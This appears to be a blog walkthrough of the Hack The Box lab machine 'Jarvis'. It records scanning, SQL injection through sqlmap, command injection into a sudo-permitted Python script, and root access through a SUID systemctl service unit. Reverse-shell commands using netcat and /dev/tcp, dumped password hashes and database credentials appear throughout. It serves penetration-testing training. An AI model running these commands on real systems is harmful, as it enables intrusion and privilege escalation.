Learning as I go

Jarvis Hack The Box Walkthrough

Posted at — Feb 17, 2020

Walkthrough of machine Jarvis from Hack the Box. Key findings include website vulnerable to SQL injection, internal script vulnerable to command line injection & not required binary suid permissions

Jarvis Banner

Walkthrough of Jarvis machine from Hack the Box.

Key Findings

Key findings noted from the machine Jarvis:

Scanning & Enumeration

Nmap was used to complete an initial scan of the host (command: nmap -A -T4 10.10.10.143). Amended outputs shown below, key items highlighted. Scan shows reported instances of:

Nmap scan failed to fingerprint the machine. The banner returned by OpenSSH suggests the machine is running Debian Stretch (7.4p1-10+deb9u6 – is the OpenSSH version available on Debian Stretch). This suggests the machine is running a reasonably recent operating system.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
<SNIP>
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
<SNIP>
|_http-server-header: Apache/2.4.25 (Debian)
<SNIP>

HTTP

Opening the website shows the page for Stark Hotel. Hostname of supersecurehotel.htb identified from reviewing the page and added to the /etc/hosts file for easier follow-up navigation.

Jarvis Website

Initial manual walkthrough of page URLs identifies the following items of interest.

Results of web enumeration tool identified a phpMyAdmin page as present.

Analysis of identified pages done using wfuzz to check for hidden parameters and potential LFI vulnerabilities.

General approach used is command: _wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt –hh 3024 -u http://supersecurehotel.htb/room.php?FUZZ=/etc/passwd_. Value supplied via hh varied based on default return length of the page.

After abandoning LFI as an attack method SQL injection tried using identified cod parameter in room.php file. Presence of SQLi vulnerability in page confirmed (command: _sqlmap -u http://supersecurehotel.htb/room.php?cod=1_). Amended output from command shown below.

<SNIP>
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 2897=2897

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 8589 FROM (SELECT(SLEEP(5)))qxAl)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-8309 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706b71,0x7a4e4a6f6b677746726d5a45795746717a5456776a74775847444d48596441784e7276724d537273,0x717a766a71),NULL,NULL-- LmIs
---
[08:04:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
<SNIP>

Remote shell then obtained using –os-shell parameter of sqlmap (command: sqlmap -u http://supersecurehotel.htb/room.php?cod=1 –os-shell). Improved shell gained by using the sqlmap os-shell to spawn a reverse shell via nc.

Gaining Access & Privilege Escalation

Initial access gained via sqlmap os-shell. Initial user determined to be www-data (generic user for running web server). Basic linux enumeration steps completed. Server confirmed as running Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.144-3.1 (2019-02-19) which lines up with earlier observations. User.txt file stored in home directory of user pepper and not directly readable.

Review of sudo privileges (command: sudo -l) identified way forward. User www-data can run command simpler.py as user pepper without supplying a password.

Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Review of the script identified a command injection vulnerability in the function exec_ping(). Vulnerability can be accessed via injecting into value command which avoids the blacklist. Resulting value will then be called by user pepper using os.system.

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

Script triggered (command: sudo -u pepper /var/www/Admin-Utilities/simpler.py -p). Command can then be injected using syntax $(). This directs the script to evaluate what is inline the () values and then supply as an input.

Enter an IP: $(cat /home/pepper/user.txt)
$(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure in name resolution

User.txt value of 2afa36c4f05b37b34259c93551f5c44f confirmed.

Shell for user pepper then obtained using the above method to spawn a new reverse netcat shell. Value of $(/tmp/bob) passed to script as a parameter where /tmp/bob contains the below. This bypasses the blacklist as the script is only evaluated when it comes to the os.system call.

#!/bin/bash
nc -nv 10.10.13.218 5552 -e /bin/sh

Further enumeration as user pepper identified a vulnerability in a configured SUID binary (command: find / -perm -u=s -type f 2>/dev/null)

/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su

A review of https://gtfobins.github.io/gtfobins/systemctl/ explained how this could be exploited.

#1 – bob.service
[Unit]
Description=root shell

[Service]
User=root
ExecStart=/bin/bash '/home/pepper/bobshell.sh'

[Install]
WantedBy=multi-user.target

# 2 – bobshell.sh

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.13.218/5500 0>&1

With login obtained root.txt value of d41d8cd98f00b204e9800998ecf84271 then confirmed.

Post Exploitation

Mysql credentials

Review of the config.php file in the web directory confirmed the database credentials.

<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>

These credentials work when logging into the identified phpMyAdmin instance. Manual review of the database contents reveals nothing of interest.

System Password hashes

With root access the following system password hashes were then extracted. Attempts at cracking these have provided unsuccessful.

root:$6$4b8khrb3$HYMrEymM/Gv0LcVdrC0L9dPal6oV4uXbQTdbSVOlWsDSlSP7QuDGp10izcfIMc16ZPr0UGZGGoWTgzPuGwg0K1:17960:0:99999:7:::
pepper:$6$ppVlcz04$Nx619njlzUuUPZaUnKBWCiPNVngd0Zw7lgxywgZFzuCl7i9G9Ltl0TLPucaThquZhpQzoSOVglkUrbdTfjDqI1:17960:0:99999:7:::

Alternative File Upload Tool

Review of the web upload directory identified the file getfileayax.php. Its surmised this could be used as an alternative exploit method. Attempts at trying to upload a file via it using curl was unsuccessful.

<?php
error_reporting(0);
if($_POST['getfile']){
if(file_get_contents($_POST['getfile'])){
echo '<h4 style="color:black;">'.htmlspecialchars(file_get_contents($_POST['getfile'])).'</h4>';
}
else{
echo '<h2 style="color:red">Nothing to show</h2>';
}
}
else{
header("Location:/index.php");}
?>